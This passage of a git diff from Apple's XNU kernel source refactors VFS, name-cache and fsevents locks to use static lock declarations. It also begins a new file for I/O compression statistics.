 fs_buffer_cache_gc_register(void (* callout)(int, void *), void *context)
 {
-       lck_mtx_lock(buf_gc_callout);
+       lck_mtx_lock(&buf_gc_callout);
        for (int i = 0; i < FS_BUFFER_CACHE_GC_CALLOUTS_MAX_SIZE; i++) {
                if (fs_callouts[i].callout == NULL) {
                        fs_callouts[i].callout = callout;
                        fs_callouts[i].context = context;
-                       lck_mtx_unlock(buf_gc_callout);
+                       lck_mtx_unlock(&buf_gc_callout);
                        return 0;
                }
        }
 
-       lck_mtx_unlock(buf_gc_callout);
+       lck_mtx_unlock(&buf_gc_callout);
        return ENOMEM;
 }
 
 int
 fs_buffer_cache_gc_unregister(void (* callout)(int, void *), void *context)
 {
-       lck_mtx_lock(buf_gc_callout);
+       lck_mtx_lock(&buf_gc_callout);
        for (int i = 0; i < FS_BUFFER_CACHE_GC_CALLOUTS_MAX_SIZE; i++) {
                if (fs_callouts[i].callout == callout &&
                    fs_callouts[i].context == context) {
@@ -4711,20 +4695,20 @@ fs_buffer_cache_gc_unregister(void (* callout)(int, void *), void *context)
                        fs_callouts[i].context = NULL;
                }
        }
-       lck_mtx_unlock(buf_gc_callout);
+       lck_mtx_unlock(&buf_gc_callout);
        return 0;
 }
 
 static void
 fs_buffer_cache_gc_dispatch_callouts(int all)
 {
-       lck_mtx_lock(buf_gc_callout);
+       lck_mtx_lock(&buf_gc_callout);
        for (int i = 0; i < FS_BUFFER_CACHE_GC_CALLOUTS_MAX_SIZE; i++) {
                if (fs_callouts[i].callout != NULL) {
                        fs_callouts[i].callout(all, fs_callouts[i].context);
                }
        }
-       lck_mtx_unlock(buf_gc_callout);
+       lck_mtx_unlock(&buf_gc_callout);
 }
 
 static boolean_t
@@ -4747,10 +4731,10 @@ buffer_cache_gc(int all)
         * for deep sleep), we only evict up to BUF_MAX_GC_BATCH_SIZE buffers
         * that have not been accessed in the last BUF_STALE_THRESHOLD seconds.
         * BUF_MAX_GC_BATCH_SIZE controls both the hold time of the global lock
-        * "buf_mtxp" and the length of time we spend compute bound in the GC
+        * "buf_mtx" and the length of time we spend compute bound in the GC
         * thread which calls this function
         */
-       lck_mtx_lock(buf_mtxp);
+       lck_mtx_lock(&buf_mtx);
 
        do {
                found = 0;
@@ -4803,7 +4787,7 @@ buffer_cache_gc(int all)
                }
 
                /* Drop lock for batch processing */
-               lck_mtx_unlock(buf_mtxp);
+               lck_mtx_unlock(&buf_mtx);
 
                /* Wakeup and yield for laundry if need be */
                if (need_wakeup) {
@@ -4832,7 +4816,7 @@ buffer_cache_gc(int all)
                        bp->b_whichq = BQ_EMPTY;
                        BLISTNONE(bp);
                }
-               lck_mtx_lock(buf_mtxp);
+               lck_mtx_lock(&buf_mtx);
 
                /* Back under lock, move them all to invalid hash and clear busy */
                TAILQ_FOREACH(bp, &privq, b_freelist) {
@@ -4853,7 +4837,7 @@ buffer_cache_gc(int all)
                TAILQ_CONCAT(&bufqueues[BQ_EMPTY], &privq, b_freelist);
        } while (all && (found == BUF_MAX_GC_BATCH_SIZE));
 
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 
        fs_buffer_cache_gc_dispatch_callouts(all);
 
@@ -4898,7 +4882,7 @@ bflushq(int whichq, mount_t mp)
        }
 
 restart:
-       lck_mtx_lock(buf_mtxp);
+       lck_mtx_lock(&buf_mtx);
 
        bp = TAILQ_FIRST(&bufqueues[whichq]);
 
@@ -4923,7 +4907,7 @@ restart:
                        total_writes++;
 
                        if (buf_count >= NFLUSH) {
-                               lck_mtx_unlock(buf_mtxp);
+                               lck_mtx_unlock(&buf_mtx);
 
                                qsort(flush_table, buf_count, sizeof(struct buf *), bp_cmp);
 
@@ -4934,7 +4918,7 @@ restart:
                        }
                }
        }
-       lck_mtx_unlock(buf_mtxp);
+       lck_mtx_unlock(&buf_mtx);
 
        if (buf_count > 0) {
                qsort(flush_table, buf_count, sizeof(struct buf *), bp_cmp);
index 9d4ed9a6d326a9e31282027f8fb1b35835be2db0..8f75a27361102cf240fbea8639f9a558e6ff455c 100644 (file)
@@ -145,21 +145,15 @@ struct  nchstats nchstats;              /* cache effectiveness statistics */
 
 
 /* vars for name cache list lock */
-lck_grp_t * namecache_lck_grp;
-lck_grp_attr_t * namecache_lck_grp_attr;
-lck_attr_t * namecache_lck_attr;
+static LCK_GRP_DECLARE(namecache_lck_grp, "Name Cache");
+static LCK_RW_DECLARE(namecache_rw_lock, &namecache_lck_grp);
 
-lck_grp_t * strcache_lck_grp;
-lck_grp_attr_t * strcache_lck_grp_attr;
-lck_attr_t * strcache_lck_attr;
+static LCK_GRP_DECLARE(strcache_lck_grp, "String Cache");
+static LCK_ATTR_DECLARE(strcache_lck_attr, 0, 0);
+LCK_RW_DECLARE_ATTR(strtable_rw_lock, &strcache_lck_grp, &strcache_lck_attr);
 
-lck_grp_t * rootvnode_lck_grp;
-lck_grp_attr_t * rootvnode_lck_grp_attr;
-lck_attr_t * rootvnode_lck_attr;
-
-lck_rw_t  * namecache_rw_lock;
-lck_rw_t  * strtable_rw_lock;
-lck_rw_t  * rootvnode_rw_lock;
+static LCK_GRP_DECLARE(rootvnode_lck_grp, "rootvnode");
+LCK_RW_DECLARE(rootvnode_rw_lock, &rootvnode_lck_grp);
 
 #define NUM_STRCACHE_LOCKS 1024
 
@@ -2400,8 +2394,6 @@ init_crc32(void)
 void
 nchinit(void)
 {
-       int     i;
-
        desiredNegNodes = (desiredvnodes / 10);
        desiredNodes = desiredvnodes + desiredNegNodes;
 
@@ -2416,61 +2408,27 @@ nchinit(void)
 
        init_string_table();
 
-       /* Allocate name cache lock group attribute and group */
-       namecache_lck_grp_attr = lck_grp_attr_alloc_init();
-
-       namecache_lck_grp = lck_grp_alloc_init("Name Cache", namecache_lck_grp_attr);
-
-       /* Allocate name cache lock attribute */
-       namecache_lck_attr = lck_attr_alloc_init();
-
-       /* Allocate name cache lock */
-       namecache_rw_lock = lck_rw_alloc_init(namecache_lck_grp, namecache_lck_attr);
-
-
-       /* Allocate string cache lock group attribute and group */
-       strcache_lck_grp_attr = lck_grp_attr_alloc_init();
-
-       strcache_lck_grp = lck_grp_alloc_init("String Cache", strcache_lck_grp_attr);
-
-       /* Allocate string cache lock attribute */
-       strcache_lck_attr = lck_attr_alloc_init();
-
-       /* Allocate string cache lock */
-       strtable_rw_lock = lck_rw_alloc_init(strcache_lck_grp, strcache_lck_attr);
-
-       for (i = 0; i < NUM_STRCACHE_LOCKS; i++) {
-               lck_mtx_init(&strcache_mtx_locks[i], strcache_lck_grp, strcache_lck_attr);
+       for (int i = 0; i < NUM_STRCACHE_LOCKS; i++) {
+               lck_mtx_init(&strcache_mtx_locks[i], &strcache_lck_grp, &strcache_lck_attr);
        }
-
-       /* Allocate root vnode lock group attribute and group */
-       rootvnode_lck_grp_attr = lck_grp_attr_alloc_init();
-
-       rootvnode_lck_grp = lck_grp_alloc_init("rootvnode", rootvnode_lck_grp_attr);
-
-       /* Allocate rootvnode lock attribute */
-       rootvnode_lck_attr = lck_attr_alloc_init();
-
-       /* Allocate rootvnode lock */
-       rootvnode_rw_lock = lck_rw_alloc_init(rootvnode_lck_grp, rootvnode_lck_attr);
 }
 
 void
 name_cache_lock_shared(void)
 {
-       lck_rw_lock_shared(namecache_rw_lock);
+       lck_rw_lock_shared(&namecache_rw_lock);
 }
 
 void
 name_cache_lock(void)
 {
-       lck_rw_lock_exclusive(namecache_rw_lock);
+       lck_rw_lock_exclusive(&namecache_rw_lock);
 }
 
 void
 name_cache_unlock(void)
 {
-       lck_rw_done(namecache_rw_lock);
+       lck_rw_done(&namecache_rw_lock);
 }
 
 
@@ -2718,10 +2676,10 @@ resize_string_ref_table(void)
         * the lock exclusively in case some other thread
         * beat us to the punch
         */
-       lck_rw_lock_exclusive(strtable_rw_lock);
+       lck_rw_lock_exclusive(&strtable_rw_lock);
 
        if (4 * filled_buckets < ((string_table_mask + 1) * 3)) {
-               lck_rw_done(strtable_rw_lock);
+               lck_rw_done(&strtable_rw_lock);
                return;
        }
        assert(string_table_mask < INT32_MAX);
@@ -2729,7 +2687,7 @@ resize_string_ref_table(void)
 
        if (new_table == NULL) {
                printf("failed to resize the hash table.\n");
-               lck_rw_done(strtable_rw_lock);
+               lck_rw_done(&strtable_rw_lock);
                return;
        }
 
@@ -2755,7 +2713,7 @@ resize_string_ref_table(void)
                        LIST_INSERT_HEAD(head, entry, hash_chain);
                }
        }
-       lck_rw_done(strtable_rw_lock);
+       lck_rw_done(&strtable_rw_lock);
 
        FREE(old_table, M_CACHE);
 }
@@ -2806,17 +2764,17 @@ add_name_internal(const char *name, uint32_t len, u_int hashval, boolean_t need_
         * if someone else decides to grow the pool they
         * will take this lock exclusively
         */
-       lck_rw_lock_shared(strtable_rw_lock);
+       lck_rw_lock_shared(&strtable_rw_lock);
 
        /*
         * If the table gets more than 3/4 full, resize it
         */
        if (4 * filled_buckets >= ((string_table_mask + 1) * 3)) {
-               lck_rw_done(strtable_rw_lock);
+               lck_rw_done(&strtable_rw_lock);
 
                resize_string_ref_table();
 
-               lck_rw_lock_shared(strtable_rw_lock);
+               lck_rw_lock_shared(&strtable_rw_lock);
        }
        hash_index = hashval & string_table_mask;
        lock_index = hash_index % NUM_STRCACHE_LOCKS;
@@ -2853,7 +2811,7 @@ add_name_internal(const char *name, uint32_t len, u_int hashval, boolean_t need_
        }
 
        lck_mtx_unlock(&strcache_mtx_locks[lock_index]);
-       lck_rw_done(strtable_rw_lock);
+       lck_rw_done(&strtable_rw_lock);
 
        return (const char *)entry->str;
 }
@@ -2876,7 +2834,7 @@ vfs_removename(const char *nameref)
         * if someone else decides to grow the pool they
         * will take this lock exclusively
         */
-       lck_rw_lock_shared(strtable_rw_lock);
+       lck_rw_lock_shared(&strtable_rw_lock);
        /*
         * must compute the head behind the table lock
         * since the size and location of the table
@@ -2907,7 +2865,7 @@ vfs_removename(const char *nameref)
                }
        }
        lck_mtx_unlock(&strcache_mtx_locks[lock_index]);
-       lck_rw_done(strtable_rw_lock);
+       lck_rw_done(&strtable_rw_lock);
 
        kheap_free_addr(KHEAP_DEFAULT, entry);
 
@@ -2923,7 +2881,7 @@ dump_string_table(void)
        string_t          *entry;
        u_long            i;
 
-       lck_rw_lock_shared(strtable_rw_lock);
+       lck_rw_lock_shared(&strtable_rw_lock);
 
        for (i = 0; i <= string_table_mask; i++) {
                head = &string_ref_table[i];
@@ -2931,6 +2889,6 @@ dump_string_table(void)
                        printf("%6d - %s\n", entry->refcount, entry->str);
                }
        }
-       lck_rw_done(strtable_rw_lock);
+       lck_rw_done(&strtable_rw_lock);
 }
 #endif  /* DUMP_STRING_TABLE */
index fb8e519e283afc2a0247d7c7fb2c0b5144587a96..2507a242c6b4b76c8f3cdac96a3357cdcc45fff0 100644 (file)
@@ -152,16 +152,18 @@ static void fsevents_wakeup(fs_event_watcher *watcher);
 //
 // Locks
 //
-static lck_grp_attr_t *  fsevent_group_attr;
-static lck_attr_t *      fsevent_lock_attr;
-static lck_grp_t *       fsevent_mutex_group;
+static LCK_ATTR_DECLARE(fsevent_lock_attr, 0, 0);
+static LCK_GRP_DECLARE(fsevent_mutex_group, "fsevent-mutex");
+static LCK_GRP_DECLARE(fsevent_rw_group, "fsevent-rw");
 
-static lck_grp_t *       fsevent_rw_group;
-
-static lck_rw_t  event_handling_lock; // handles locking for event manipulation and recycling
-static lck_mtx_t watch_table_lock;
-static lck_mtx_t event_buf_lock;
-static lck_mtx_t event_writer_lock;
+static LCK_RW_DECLARE_ATTR(event_handling_lock, // handles locking for event manipulation and recycling
+    &fsevent_rw_group, &fsevent_lock_attr);
+static LCK_MTX_DECLARE_ATTR(watch_table_lock,
+    &fsevent_mutex_group, &fsevent_lock_attr);
+static LCK_MTX_DECLARE_ATTR(event_buf_lock,
+    &fsevent_mutex_group, &fsevent_lock_attr);
+static LCK_MTX_DECLARE_ATTR(event_writer_lock,
+    &fsevent_mutex_group, &fsevent_lock_attr);
 
 
 /* Explicitly declare qsort so compiler doesn't complain */
@@ -204,29 +206,16 @@ fsevents_internal_init(void)
 
        memset(watcher_table, 0, sizeof(watcher_table));
 
-       fsevent_lock_attr    = lck_attr_alloc_init();
-       fsevent_group_attr   = lck_grp_attr_alloc_init();
-       fsevent_mutex_group  = lck_grp_alloc_init("fsevent-mutex", fsevent_group_attr);
-       fsevent_rw_group     = lck_grp_alloc_init("fsevent-rw", fsevent_group_attr);
-
-       lck_mtx_init(&watch_table_lock, fsevent_mutex_group, fsevent_lock_attr);
-       lck_mtx_init(&event_buf_lock, fsevent_mutex_group, fsevent_lock_attr);
-       lck_mtx_init(&event_writer_lock, fsevent_mutex_group, fsevent_lock_attr);
-
-       lck_rw_init(&event_handling_lock, fsevent_rw_group, fsevent_lock_attr);
-
        PE_get_default("kern.maxkfsevents", &max_kfs_events, sizeof(max_kfs_events));
 
        event_zone = zone_create_ext("fs-event-buf", sizeof(kfs_event),
            ZC_NOGC | ZC_NOCALLOUT, ZONE_ID_ANY, ^(zone_t z) {
                // mark the zone as exhaustible so that it will not
                // ever grow beyond what we initially filled it with
-               zone_set_exhaustible(z, max_kfs_events * sizeof(kfs_event));
+               zone_set_exhaustible(z, max_kfs_events);
        });
 
-       if (zfill(event_zone, max_kfs_events) < max_kfs_events) {
-               printf("fsevents: failed to pre-fill the event zone.\n");
-       }
+       zone_fill_initially(event_zone, max_kfs_events);
 }
 
 static void
index 4ba18afa488b8e1e62246a87382437f9a7127784..366e5170a45fe3b830f5cfd95b4a3471221b86a1 100644 (file)
@@ -111,15 +111,8 @@ fslog_extmod_msgtracer(proc_t caller, proc_t target)
  * Log information about floating point exception handling
  */
 
-static lck_mtx_t fpxlock;
-
-void
-fpxlog_init(void)
-{
-       lck_grp_attr_t *lck_grp_attr = lck_grp_attr_alloc_init();
-       lck_grp_t *lck_grp = lck_grp_alloc_init("fpx", lck_grp_attr);
-       lck_mtx_init(&fpxlock, lck_grp, LCK_ATTR_NULL);
-}
+static LCK_GRP_DECLARE(fpxlock_grp, "fpx");
+static LCK_MTX_DECLARE(fpxlock, &fpxlock_grp);
 
 struct fpx_event {
        uuid_t fe_uuid;
@@ -269,11 +262,4 @@ fpxlog(
            NULL);
 }
 
-#else
-
-void
-fpxlog_init(void)
-{
-}
-
 #endif /* __x86_64__ */
index 441d9269fea3d7344c43c97c50ca19f791aac10b..99f99e44e6886573d0de1b9c0eecdf3fc5f349eb 100644 (file)
@@ -270,53 +270,23 @@ vfs_op_init(void)
 extern struct vnodeops dead_vnodeops;
 extern struct vnodeops spec_vnodeops;
 
-/* vars for vnode lock */
-lck_grp_t * vnode_lck_grp;
-lck_grp_attr_t * vnode_lck_grp_attr;
-lck_attr_t * vnode_lck_attr;
-
-#if CONFIG_TRIGGERS
-/* vars for vnode trigger resolver */
-lck_grp_t * trigger_vnode_lck_grp;
-lck_grp_attr_t * trigger_vnode_lck_grp_attr;
-lck_attr_t * trigger_vnode_lck_attr;
-#endif
-
-lck_grp_t * fd_vn_lck_grp;
-lck_grp_attr_t * fd_vn_lck_grp_attr;
-lck_attr_t * fd_vn_lck_attr;
-
 /* vars for vnode list lock */
-lck_grp_t * vnode_list_lck_grp;
-lck_grp_attr_t * vnode_list_lck_grp_attr;
-lck_attr_t * vnode_list_lck_attr;
-lck_spin_t * vnode_list_spin_lock;
-lck_mtx_t * spechash_mtx_lock;
-
-/* vars for vfsconf lock */
-lck_grp_t * fsconf_lck_grp;
-lck_grp_attr_t * fsconf_lck_grp_attr;
-lck_attr_t * fsconf_lck_attr;
-
+static LCK_GRP_DECLARE(vnode_list_lck_grp, "vnode list");
+static LCK_ATTR_DECLARE(vnode_list_lck_attr, 0, 0);
+static LCK_SPIN_DECLARE_ATTR(vnode_list_spin_lock,
+    &vnode_list_lck_grp, &vnode_list_lck_attr);
+static LCK_MTX_DECLARE_ATTR(spechash_mtx_lock,
+    &vnode_list_lck_grp, &vnode_list_lck_attr);
+LCK_MTX_DECLARE_ATTR(pkg_extensions_lck,
+    &vnode_list_lck_grp, &vnode_list_lck_attr);
 
 /* vars for mount lock */
-lck_grp_t * mnt_lck_grp;
-lck_grp_attr_t * mnt_lck_grp_attr;
-lck_attr_t * mnt_lck_attr;
+static LCK_GRP_DECLARE(mnt_lck_grp, "mount");
+static LCK_ATTR_DECLARE(mnt_lck_attr, 0, 0);
 
 /* vars for mount list lock */
-lck_grp_t * mnt_list_lck_grp;
-lck_grp_attr_t * mnt_list_lck_grp_attr;
-lck_attr_t * mnt_list_lck_attr;
-lck_mtx_t * mnt_list_mtx_lock;
-
-/* vars for sync mutex */
-lck_grp_t * sync_mtx_lck_grp;
-lck_grp_attr_t * sync_mtx_lck_grp_attr;
-lck_attr_t * sync_mtx_lck_attr;
-lck_mtx_t * sync_mtx_lck;
-
-lck_mtx_t *pkg_extensions_lck;
+static LCK_GRP_DECLARE(mnt_list_lck_grp, "mount list");
+LCK_MTX_DECLARE(mnt_list_mtx_lock, &mnt_list_lck_grp);
 
 struct mount * dead_mountp;
 
@@ -330,77 +300,6 @@ vfsinit(void)
        int i, maxtypenum;
        struct mount * mp;
 
-       /* Allocate vnode list lock group attribute and group */
-       vnode_list_lck_grp_attr = lck_grp_attr_alloc_init();
-
-       vnode_list_lck_grp = lck_grp_alloc_init("vnode list", vnode_list_lck_grp_attr);
-
-       /* Allocate vnode list lock attribute */
-       vnode_list_lck_attr = lck_attr_alloc_init();
-
-       /* Allocate vnode list lock */
-       vnode_list_spin_lock = lck_spin_alloc_init(vnode_list_lck_grp, vnode_list_lck_attr);
-
-       /* Allocate spec hash list lock */
-       spechash_mtx_lock = lck_mtx_alloc_init(vnode_list_lck_grp, vnode_list_lck_attr);
-
-       /* Allocate the package extensions table lock */
-       pkg_extensions_lck = lck_mtx_alloc_init(vnode_list_lck_grp, vnode_list_lck_attr);
-
-       /* allocate vnode lock group attribute and group */
-       vnode_lck_grp_attr = lck_grp_attr_alloc_init();
-
-       vnode_lck_grp = lck_grp_alloc_init("vnode", vnode_lck_grp_attr);
-
-       /* Allocate vnode lock attribute */
-       vnode_lck_attr = lck_attr_alloc_init();
-
-#if CONFIG_TRIGGERS
-       trigger_vnode_lck_grp_attr = lck_grp_attr_alloc_init();
-       trigger_vnode_lck_grp = lck_grp_alloc_init("trigger_vnode", trigger_vnode_lck_grp_attr);
-       trigger_vnode_lck_attr = lck_attr_alloc_init();
-#endif
-       /* Allocate per fd vnode data lock attribute and group */
-       fd_vn_lck_grp_attr = lck_grp_attr_alloc_init();
-       fd_vn_lck_grp = lck_grp_alloc_init("fd_vnode_data", fd_vn_lck_grp_attr);
-       fd_vn_lck_attr = lck_attr_alloc_init();
-
-       /* Allocate fs config lock group attribute and group */
-       fsconf_lck_grp_attr = lck_grp_attr_alloc_init();
-
-       fsconf_lck_grp = lck_grp_alloc_init("fs conf", fsconf_lck_grp_attr);
-
-       /* Allocate fs config lock attribute */
-       fsconf_lck_attr = lck_attr_alloc_init();
-
-       /* Allocate mount point related lock structures  */
-
-       /* Allocate mount list lock group attribute and group */
-       mnt_list_lck_grp_attr = lck_grp_attr_alloc_init();
-
-       mnt_list_lck_grp = lck_grp_alloc_init("mount list", mnt_list_lck_grp_attr);
-
-       /* Allocate mount list lock attribute */
-       mnt_list_lck_attr = lck_attr_alloc_init();
-
-       /* Allocate mount list lock */
-       mnt_list_mtx_lock = lck_mtx_alloc_init(mnt_list_lck_grp, mnt_list_lck_attr);
-
-
-       /* allocate mount lock group attribute and group */
-       mnt_lck_grp_attr = lck_grp_attr_alloc_init();
-
-       mnt_lck_grp = lck_grp_alloc_init("mount", mnt_lck_grp_attr);
-
-       /* Allocate mount lock attribute */
-       mnt_lck_attr = lck_attr_alloc_init();
-
-       /* Allocate sync lock */
-       sync_mtx_lck_grp_attr =  lck_grp_attr_alloc_init();
-       sync_mtx_lck_grp =       lck_grp_alloc_init("sync thread", sync_mtx_lck_grp_attr);
-       sync_mtx_lck_attr =      lck_attr_alloc_init();
-       sync_mtx_lck =           lck_mtx_alloc_init(sync_mtx_lck_grp, sync_mtx_lck_attr);
-
        /*
         * Initialize the vnode table
         */
@@ -471,13 +370,6 @@ vfsinit(void)
         */
        vnode_authorize_init();
 
-       /*
-        * Initialiize the quota system.
-        */
-#if QUOTA
-       dqinit();
-#endif
-
        /*
         * create a mount point for dead vnodes
         */
@@ -518,43 +410,43 @@ vfsinit(void)
 void
 vnode_list_lock(void)
 {
-       lck_spin_lock_grp(vnode_list_spin_lock, vnode_list_lck_grp);
+       lck_spin_lock_grp(&vnode_list_spin_lock, &vnode_list_lck_grp);
 }
 
 void
 vnode_list_unlock(void)
 {
-       lck_spin_unlock(vnode_list_spin_lock);
+       lck_spin_unlock(&vnode_list_spin_lock);
 }
 
 void
 mount_list_lock(void)
 {
-       lck_mtx_lock(mnt_list_mtx_lock);
+       lck_mtx_lock(&mnt_list_mtx_lock);
 }
 
 void
 mount_list_unlock(void)
 {
-       lck_mtx_unlock(mnt_list_mtx_lock);
+       lck_mtx_unlock(&mnt_list_mtx_lock);
 }
 
 void
 mount_lock_init(mount_t mp)
 {
-       lck_mtx_init(&mp->mnt_mlock, mnt_lck_grp, mnt_lck_attr);
-       lck_mtx_init(&mp->mnt_iter_lock, mnt_lck_grp, mnt_lck_attr);
-       lck_mtx_init(&mp->mnt_renamelock, mnt_lck_grp, mnt_lck_attr);
-       lck_rw_init(&mp->mnt_rwlock, mnt_lck_grp, mnt_lck_attr);
+       lck_mtx_init(&mp->mnt_mlock, &mnt_lck_grp, &mnt_lck_attr);
+       lck_mtx_init(&mp->mnt_iter_lock, &mnt_lck_grp, &mnt_lck_attr);
+       lck_mtx_init(&mp->mnt_renamelock, &mnt_lck_grp, &mnt_lck_attr);
+       lck_rw_init(&mp->mnt_rwlock, &mnt_lck_grp, &mnt_lck_attr);
 }
 
 void
 mount_lock_destroy(mount_t mp)
 {
-       lck_mtx_destroy(&mp->mnt_mlock, mnt_lck_grp);
-       lck_mtx_destroy(&mp->mnt_iter_lock, mnt_lck_grp);
-       lck_mtx_destroy(&mp->mnt_renamelock, mnt_lck_grp);
-       lck_rw_destroy(&mp->mnt_rwlock, mnt_lck_grp);
+       lck_mtx_destroy(&mp->mnt_mlock, &mnt_lck_grp);
+       lck_mtx_destroy(&mp->mnt_iter_lock, &mnt_lck_grp);
+       lck_mtx_destroy(&mp->mnt_renamelock, &mnt_lck_grp);
+       lck_rw_destroy(&mp->mnt_rwlock, &mnt_lck_grp);
 }
 
 
@@ -676,7 +568,7 @@ vfstable_del(struct vfstable  * vtbl)
        struct vfstable *vcdelp;
 
 #if DEBUG
-       lck_mtx_assert(mnt_list_mtx_lock, LCK_MTX_ASSERT_OWNED);
+       lck_mtx_assert(&mnt_list_mtx_lock, LCK_MTX_ASSERT_OWNED);
 #endif /* DEBUG */
 
        /*
@@ -727,7 +619,7 @@ vfstable_del(struct vfstable  * vtbl)
        }
 
 #if DEBUG
-       lck_mtx_assert(mnt_list_mtx_lock, LCK_MTX_ASSERT_OWNED);
+       lck_mtx_assert(&mnt_list_mtx_lock, LCK_MTX_ASSERT_OWNED);
 #endif /* DEBUG */
 
        return 0;
@@ -736,11 +628,11 @@ vfstable_del(struct vfstable  * vtbl)
 void
 SPECHASH_LOCK(void)
 {
-       lck_mtx_lock(spechash_mtx_lock);
+       lck_mtx_lock(&spechash_mtx_lock);
 }
 
 void
 SPECHASH_UNLOCK(void)
 {
-       lck_mtx_unlock(spechash_mtx_lock);
+       lck_mtx_unlock(&spechash_mtx_lock);
 }
diff --git a/bsd/vfs/vfs_io_compression_stats.c b/bsd/vfs/vfs_io_compression_stats.c
new file mode 100644 (file)
index 0000000..d2fee5f
--- /dev/null
@@ -0,0 +1,738 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+#include <kern/cpu_data.h>
+#include <kern/cpu_number.h>
+#include <kern/host.h>
+
+#include <mach/host_priv.h>
+#include <mach/host_special_ports.h>
+#include <mach/host_info.h>
+#include <mach/iocompressionstats_notification_server.h>
+#include <mach/mach_host.h>
+
+#include <sys/mount_internal.h>
+#include <sys/param.h>
+#include <sys/sysctl.h>
+#include <sys/vnode.h>
+#include <sys/vnode_internal.h>
+
+#include <vfs/vfs_io_compression_stats.h>
+
+#include <vm/lz4.h>
+#include <vm/vm_compressor_algorithms.h>
+#include <vm/vm_protos.h>
+
+
+int io_compression_stats_enable = 0;
+int io_compression_stats_block_size = IO_COMPRESSION_STATS_DEFAULT_BLOCK_SIZE;
+
+#define LZ4_SCRATCH_ALIGN (64)
+typedef struct {
+       uint8_t lz4state[lz4_encode_scratch_size]__attribute((aligned(LZ4_SCRATCH_ALIGN)));
+} lz4_encode_scratch_t;
+
+lz4_encode_scratch_t **per_cpu_scratch_buf;
+uint8_t **per_cpu_compression_buf;
+uint32_t io_compression_stats_cpu_count;
+char *vnpath_scratch_buf;
+
+LCK_GRP_DECLARE(io_compression_stats_lckgrp, "io_compression_stats");
+LCK_RW_DECLARE(io_compression_stats_lock, &io_compression_stats_lckgrp);
+LCK_MTX_DECLARE(iocs_store_buffer_lock, &io_compression_stats_lckgrp);
+
+typedef enum io_compression_stats_allocate_type {
+       IO_COMPRESSION_STATS_NEW_ALLOC = 0,
+       IO_COMPRESSION_STATS_RESIZE = 1
+} io_compression_stats_alloc_type_t;
+
+static void io_compression_stats_deallocate_compression_buffers(void);
+
+struct iocs_store_buffer iocs_store_buffer = {
+       .buffer = 0,
+       .current_position = 0,
+       .marked_point = 0
+};
+
+int iocs_sb_bytes_since_last_mark = 0;
+int iocs_sb_bytes_since_last_notification = 0;
+
+ZONE_DECLARE(io_compression_stats_zone, "io_compression_stats",
+    sizeof(struct io_compression_stats), ZC_NOENCRYPT | ZC_NOGC | ZC_ZFREE_CLEARMEM);
+
+static int
+io_compression_stats_allocate_compression_buffers(io_compression_stats_alloc_type_t alloc_type, uint32_t block_size)
+{
+       int err = 0;
+       host_basic_info_data_t hinfo;
+       mach_msg_type_number_t count = HOST_BASIC_INFO_COUNT;
+#define BSD_HOST 1
+       host_info((host_t)BSD_HOST, HOST_BASIC_INFO, (host_info_t)&hinfo, &count);
+
+       io_compression_stats_cpu_count = hinfo.max_cpus;
+       if (alloc_type == IO_COMPRESSION_STATS_NEW_ALLOC) {
+               assert(per_cpu_scratch_buf == NULL);
+               per_cpu_scratch_buf = kheap_alloc(KHEAP_DEFAULT, sizeof(lz4_encode_scratch_t *) * io_compression_stats_cpu_count, Z_ZERO);
+               if (per_cpu_scratch_buf == NULL) {
+                       err = ENOMEM;
+                       goto out;
+               }
+               assert(per_cpu_compression_buf == NULL);
+               per_cpu_compression_buf = kheap_alloc(KHEAP_DEFAULT, sizeof(uint8_t *) * io_compression_stats_cpu_count, Z_ZERO);
+               if (per_cpu_compression_buf == NULL) {
+                       err = ENOMEM;
+                       goto out;
+               }
+       }
+       for (uint32_t cpu = 0; cpu < io_compression_stats_cpu_count; cpu++) {
+               if (alloc_type == IO_COMPRESSION_STATS_NEW_ALLOC) {
+                       per_cpu_scratch_buf[cpu] = kheap_alloc(KHEAP_DEFAULT, sizeof(lz4_encode_scratch_t), Z_ZERO);
+                       if (per_cpu_scratch_buf[cpu] == NULL) {
+                               err = ENOMEM;
+                               goto out;
+                       }
+               } else {
+                       kheap_free_addr(KHEAP_DEFAULT, per_cpu_compression_buf[cpu]);
+               }
+               per_cpu_compression_buf[cpu] = kheap_alloc(KHEAP_DEFAULT, block_size, Z_ZERO);
+               if (per_cpu_compression_buf[cpu] == NULL) {
+                       err = ENOMEM;
+                       goto out;
+               }
+       }
+       bzero(&iocs_store_buffer, sizeof(struct iocs_store_buffer));
+       iocs_store_buffer.buffer = kheap_alloc(KHEAP_DEFAULT, IOCS_STORE_BUFFER_SIZE, Z_ZERO);
+       if (iocs_store_buffer.buffer == NULL) {
+               err = ENOMEM;
+               goto out;
+       }
+       iocs_store_buffer.current_position = 0;
+       iocs_store_buffer.marked_point = 0;
+
+       assert(vnpath_scratch_buf == NULL);
+       vnpath_scratch_buf = kheap_alloc(KHEAP_DEFAULT, MAXPATHLEN, Z_ZERO);
+       if (vnpath_scratch_buf == NULL) {
+               err = ENOMEM;
+               goto out;
+       }
+
+out:
+       if (err) {
+               /* In case of any error, irrespective of whether it is new alloc or resize,
+                *  dellocate all buffers and fail */
+               io_compression_stats_deallocate_compression_buffers();
+       }
+       return err;
+}
+
+static void
+io_compression_stats_deallocate_compression_buffers()
+{
+       uint32_t cpu;
+       if (per_cpu_compression_buf != NULL) {
+               for (cpu = 0; cpu < io_compression_stats_cpu_count; cpu++) {
